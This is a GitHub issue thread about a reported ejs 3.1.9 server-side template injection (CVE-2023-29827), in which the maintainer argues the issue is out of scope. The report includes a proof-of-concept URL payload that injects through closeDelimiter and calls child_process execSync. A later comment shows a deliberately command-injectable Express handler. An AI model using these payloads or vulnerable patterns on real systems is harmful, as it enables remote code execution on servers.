
EJS, Server side template injection ejs@3.1.9 Latest #720

Closed
pperk opened this issue Mar 13, 2023 · 10 comments

Comments

@pperk

pperk commented Mar 13, 2023

If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. It can easily bypass the fix for CVE-2022-29078 in version 3.1.7.
15ee698
index.js

const express = require('express')
const app = express()
const port = 3000

app.set('view engine', 'ejs');

app.get('/page', (req,res) => {
    // The parsed query string is handed to the renderer unfiltered, so a client
    // can supply nested keys such as settings[view options][closeDelimiter].
    res.render('page', req.query);
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})

page.ejs

%%1");process.mainModule.require('child_process').execSync('calc');//

package.json

{
  "dependencies": {
    "ejs": "^3.1.9",
    "express": "^4.18.2"
  }
}

The poc looks like this:

http://127.0.0.1:3000/page?settings[view%20options][closeDelimiter]=1")%3bprocess.mainModule.require('child_process').execSync('calc')%3b//

Execution reaches this branch, where the code splicing happens.

ejs/lib/ejs.js

Line 844 in aed0124

this.source += ' ; __append("' + line.replace(d + d + c, d + c) + '")' + '\n';


@pperk pperk closed this as completed Mar 14, 2023
@carnil

carnil commented May 5, 2023

@pperk this issue was closed shortly after the initial report without comment. Can you share details? Was this a false report?

I noticed that there was apparently a CVE assigned for this issue, CVE-2023-29827

@rohit-dreamup

Is there any plan to fix this issue? It's affecting us also!!

@mde
Owner

mde commented May 9, 2023

This is clearly addressed in the SECURITY.md for the project: https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities

In short, don't ever, ever give unfiltered access to EJS's render function. Always, always check your inputs.
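The following is an added example and not code posted by anyone in this thread or shipped by the ejs project. It shows the input check the comment above asks for: build the locals handed to `res.render` from an explicit allowlist, and flag requests that carry EJS or Express option keys (Express's query parser turns `settings[view options][closeDelimiter]=x` into a nested object, which is the path the report relies on). The `name` field, the key list and the sample query are assumptions made for the example.

```javascript
// Added example, not code from this thread or from the ejs project: instead of
// handing req.query straight to res.render, build the locals from an explicit
// allowlist and flag requests carrying EJS/Express option keys.

// Keys a client must never be able to set: EJS option names plus the Express
// `settings` / `_locals` carriers the renderer reads them from (assumed list).
const RESERVED_KEYS = new Set([
  'settings', 'view options', '_locals', 'cache', 'filename', 'root', 'views',
  'delimiter', 'openDelimiter', 'closeDelimiter', 'outputFunctionName',
  'client', 'compileDebug', 'debug', '__proto__', 'constructor', 'prototype',
]);

// Walk a parsed query object and return the dotted path of the first reserved
// key found, or null. Cheap to run before rendering and useful for logging.
function findReservedKey(value, path = '') {
  if (value === null || typeof value !== 'object') return null;
  for (const key of Object.keys(value)) {
    const here = path ? `${path}.${key}` : key;
    if (RESERVED_KEYS.has(key)) return here;
    const nested = findReservedKey(value[key], here);
    if (nested !== null) return nested;
  }
  return null;
}

// Copy only allowlisted, string-valued fields into a fresh locals object;
// nested objects and unknown keys are dropped rather than forwarded.
function pickRenderLocals(query, allowed) {
  const locals = {};
  for (const key of allowed) {
    if (typeof query[key] === 'string') locals[key] = query[key];
  }
  return locals;
}

// Handler logic with the Express/EJS calls left out so it runs stand-alone:
// returns what would be sent instead of calling res.status / res.render.
function handlePage(query) {
  const hit = findReservedKey(query);
  if (hit !== null) return { status: 400, error: `rejected reserved key ${hit}` };
  return { status: 200, locals: pickRenderLocals(query, ['name']) };
}

// Constructed sample: what Express's parser yields for a request shaped like
// the one in the report, with the payload replaced by a placeholder.
const SAMPLE_QUERY = {
  name: 'alice',
  settings: { 'view options': { closeDelimiter: '<attacker-controlled>' } },
};
```

In a real handler the 400 branch is also the place to log the offending path, since a reserved key in a query string is a clear signal rather than ordinary user input.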

@nitinac

nitinac commented May 9, 2023

The ejs@3.1.9 version is showing as high severity in a Mend scan for a React JS application. Please suggest how to get rid of this issue, since 3.1.9 is the latest version available in NPM.


@mde
Owner

mde commented May 9, 2023

I do not control any of these supposed vulnerability databases. I have sent an email to NVD. I have sent an issue to GH. Please feel free to contact those entities as well, regarding this issue.

@lebbe

lebbe commented May 11, 2023

With this approach to detecting vulnerabilities, everything becomes vulnerable. I mean...

index.js

const express = require("express");
const { exec } = require("node:child_process");

const app = express();
const port = 3000;

app.get("/page", async (req, res) => {
  exec(`echo ${req.query.script} | python`);
  res.send("?script is fed to python, please don't hack me.");
});

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`);
});

everyone, please remove python from your computers.

@sonu-jmh

Any idea on when we can expect a fix for this CVE?

@mde
Owner

mde commented May 11, 2023

Please read the thread. It's not a vulnerability, and I have no control of the databases. Please contact GitHub and NVD about this.

@meganwalker-ibm

As an FYI @mde, it looks like the organisation that assigned the CVE number is MITRE themselves: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29827

So I think you might need to contact MITRE directly through https://cveform.mitre.org/ and request a rejection of the CVE, as they are the ones who can invalidate it. GitHub and NVD are just feeding this CVE through from MITRE.

@stali1234


The latest EJS report indicates that the Blackduck scan has been provided, but it states that the issue still persists.
